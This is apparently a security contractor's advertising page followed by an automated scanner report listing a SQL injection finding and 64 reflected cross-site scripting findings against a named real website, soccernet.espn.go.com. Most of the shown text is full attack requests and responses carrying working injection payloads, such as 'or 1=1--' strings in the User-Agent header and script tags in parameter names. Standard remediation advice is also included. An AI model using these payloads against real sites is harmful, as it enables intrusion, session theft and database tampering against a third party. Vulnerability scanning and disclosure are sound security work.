Contractor for Hire: Per Minute, Per Day, Bounty Hunting
Example #1: Automated Vulnerability Crawler: $1/min, max charge is US $10 for 200 URL + 10 Params for
CWE-79, CWE-89 and CWE-113 (XSS, SQL Injection and HTTP Header Injection).
Example #2: Hybrid Risk Analysis: $2/min, max charge is US $30 for 200 URL + 10 Params, Manual Testing of High Value URI/Param targets.
Example #3: Penetration Testing: Individual Case Basis, use Live Chat for a Quote.
Example #4:
Report generated by XSS.CX at Sat Nov 13 20:12:03 CST 2010.
Cross Site Scripting Reports | Hoyt LLC Research
1. SQL injection
2. Cross-site scripting (reflected)
2.1. http://soccernet.espn.go.com/world-cup/ [name of an arbitrarily supplied request parameter]
2.2. http://soccernet.espn.go.com/worldcup/ [name of an arbitrarily supplied request parameter]
2.3. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [REST URL parameter 6]
2.4. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [name of an arbitrarily supplied request parameter]
2.5. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [REST URL parameter 6]
2.6. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [name of an arbitrarily supplied request parameter]
2.7. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [REST URL parameter 6]
2.8. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [name of an arbitrarily supplied request parameter]
2.9. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [REST URL parameter 6]
2.10. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [name of an arbitrarily supplied request parameter]
2.11. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [REST URL parameter 6]
2.12. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [name of an arbitrarily supplied request parameter]
2.13. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [REST URL parameter 6]
2.14. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [name of an arbitrarily supplied request parameter]
2.15. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [REST URL parameter 6]
2.16. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [name of an arbitrarily supplied request parameter]
2.17. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [REST URL parameter 6]
2.18. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [name of an arbitrarily supplied request parameter]
2.19. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [REST URL parameter 6]
2.20. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [name of an arbitrarily supplied request parameter]
2.21. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [REST URL parameter 6]
2.22. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [name of an arbitrarily supplied request parameter]
2.23. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [REST URL parameter 6]
2.24. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [name of an arbitrarily supplied request parameter]
2.25. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [REST URL parameter 6]
2.26. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [name of an arbitrarily supplied request parameter]
2.27. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [REST URL parameter 6]
2.28. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [name of an arbitrarily supplied request parameter]
2.29. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [REST URL parameter 6]
2.30. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [name of an arbitrarily supplied request parameter]
2.31. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [REST URL parameter 6]
2.32. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [name of an arbitrarily supplied request parameter]
2.33. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [REST URL parameter 6]
2.34. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [name of an arbitrarily supplied request parameter]
2.35. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [REST URL parameter 6]
2.36. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [name of an arbitrarily supplied request parameter]
2.37. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [REST URL parameter 6]
2.38. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [name of an arbitrarily supplied request parameter]
2.39. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [REST URL parameter 6]
2.40. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [name of an arbitrarily supplied request parameter]
2.41. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [REST URL parameter 6]
2.42. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [name of an arbitrarily supplied request parameter]
2.43. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [REST URL parameter 6]
2.44. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [name of an arbitrarily supplied request parameter]
2.45. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [REST URL parameter 6]
2.46. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [name of an arbitrarily supplied request parameter]
2.47. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [REST URL parameter 6]
2.48. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [name of an arbitrarily supplied request parameter]
2.49. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [REST URL parameter 6]
2.50. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [name of an arbitrarily supplied request parameter]
2.51. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [REST URL parameter 6]
2.52. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [name of an arbitrarily supplied request parameter]
2.53. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [REST URL parameter 6]
2.54. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [name of an arbitrarily supplied request parameter]
2.55. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [REST URL parameter 6]
2.56. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [name of an arbitrarily supplied request parameter]
2.57. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [REST URL parameter 6]
2.58. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [name of an arbitrarily supplied request parameter]
2.59. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [REST URL parameter 6]
2.60. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [name of an arbitrarily supplied request parameter]
2.61. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [REST URL parameter 6]
2.62. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [name of an arbitrarily supplied request parameter]
2.63. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [REST URL parameter 6]
2.64. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [name of an arbitrarily supplied request parameter]
1. SQL injection
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/section |
Issue detail
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 94625683'%20or%201%3d1--%20 and 94625683'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:- One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
- Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
Request 1
GET /section HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94625683'%20or%201%3d1--%20
Connection: close
|
Response 1 (redirected)
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Tue, 09 Nov 2010 13:58:26 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Tue, 09 Nov 2010 13:48:31 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Set-Cookie: SWID=E55816DF-0795-44DF-82E3-4C3EDCA1BCC0; path=/; expires=Tue, 09-Nov-2030 13:58:26 GMT; domain=.go.com;
Cache-Expires: Tue, 09 Nov 2010 13:53:10 GMT
Content-Length: 86414
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>/*c: null*/functi
...[SNIP]...
<td style="padding-left: 5px; text-align: left; width: 70%;" colspan="3">Italian Serie A</td></tr>
<tr align="right" class="colhead"><td style="padding-left: 5px; text-align: left; width: 70%;">November 8, 2010</td>
<td width="20%" align="center">P</td>
<td width="10%" align="center">Pts</td>
</tr>
<tr class="oddrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=112&cc=null">Lazio</a></td><td align="center">10</td><td align="center">22</td></tr><tr class="evenrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=103&cc=null">AC Milan</a></td><td align="center">10</td><td align="center">20</td></tr><tr class="oddrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=110&cc=null">Internazionale</a></td><td align="center">10</td><td align="center">19</td></tr><tr class="evenrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=111&cc=null">Juventus</a></td><td align="center">10</td><td align="center">18</td></tr><tr class="oddrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=114&cc=null">Napoli</a></td><td align="center">10</td><td align="center">18</td></tr><tr class="evenrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=2734&cc=null">Sampdoria</a></td><td align="center">10</td><td align="center">15</td></tr><tr class="oddrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=104&cc=null">AS Roma</a></td><td align="center">10</td><td align="center">15</td></tr><tr class="evenrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=2923&cc=null">Palermo</a></td><td alig
...[SNIP]...
|
Request 2
GET /section HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94625683'%20or%201%3d2--%20
Connection: close
|
Response 2 (redirected)
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Tue, 09 Nov 2010 13:58:27 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Tue, 09 Nov 2010 13:53:34 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN34
Set-Cookie: SWID=AE43D05F-46B0-474A-9F02-A5DE8709CEC7; path=/; expires=Tue, 09-Nov-2030 13:58:27 GMT; domain=.go.com;
Cache-Expires: Tue, 09 Nov 2010 13:58:13 GMT
Content-Length: 86472
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>/*c: null*/functi
...[SNIP]...
<td style="padding-left: 5px; text-align: left; width: 70%;" colspan="3">French Ligue 1</td></tr>
<tr align="right" class="colhead"><td style="padding-left: 5px; text-align: left; width: 70%;">November 9, 2010</td>
<td width="20%" align="center">P</td>
<td width="10%" align="center">Pts</td>
</tr>
<tr class="oddrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=6997&cc=null">Brest</a></td><td align="center">12</td><td align="center">21</td></tr><tr class="evenrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=169&cc=null">Stade Rennes</a></td><td align="center">11</td><td align="center">20</td></tr><tr class="oddrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=160&cc=null">Paris Saint-Germain </a></td><td align="center">12</td><td align="center">19</td></tr><tr class="evenrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=176&cc=null">Marseille</a></td><td align="center">11</td><td align="center">18</td></tr><tr class="oddrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=166&cc=null">Lille</a></td><td align="center">12</td><td align="center">18</td></tr><tr class="evenrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=178&cc=null">St Etienne</a></td><td align="center">12</td><td align="center">18</td></tr><tr class="oddrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=179&cc=null">Toulouse</a></td><td align="center">12</td><td align="center">18</td></tr><tr class="evenrow" align="right">
<td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=274&cc=null">Montpellier</a
...[SNIP]...
|
2. Cross-site scripting (reflected)
previous
There are 64 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://soccernet.espn.go.com/world-cup/ [name of an arbitrarily supplied request parameter]
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/world-cup/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2757a"><script>alert(1)</script>d8f9d1d4373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /world-cup/?2757a"><script>alert(1)</script>d8f9d1d4373=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
|
Response
HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 12:56:45 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Set-Cookie: SWID=3049331C-CFBF-4614-8EC0-FF585AF6D5A9; path=/; expires=Sat, 06-Nov-2030 12:56:42 GMT; domain=.go.com;
Cache-Expires: Sat, 06 Nov 2010 12:58:42 GMT
Content-Length: 71086
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 16 Nov 2010 12:56:45 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FIFA World Cup 2010
...[SNIP]...
<a href="/worldcup/?2757a"><script>alert(1)</script>d8f9d1d4373=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory">
...[SNIP]...
|
2.2. http://soccernet.espn.go.com/worldcup/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f969c"><script>alert(1)</script>f855b539bca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /worldcup/?f969c"><script>alert(1)</script>f855b539bca=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=120
Date: Sat, 06 Nov 2010 23:04:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:04:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:06:42 GMT
Content-Length: 71086
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FIFA World Cup 2010
...[SNIP]...
<a href="/worldcup/?f969c"><script>alert(1)</script>f855b539bca=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory">
...[SNIP]...
|
2.3. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/162/italy |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f74"><a>9d3befebb57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italyb2f74"><a>9d3befebb57 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:11:07 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:11:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Sat, 06 Nov 2010 23:16:07 GMT
Content-Length: 81049
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Italy Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=162&_slug_=italyb2f74"><a>9d3befebb57&topId=792021&linktext=Lippi+takes+blame+for+Italy%27s+early+exit">
...[SNIP]...
|
2.4. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/162/italy |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efac"><a>1119d197ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italy?6efac"><a>1119d197ed9=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
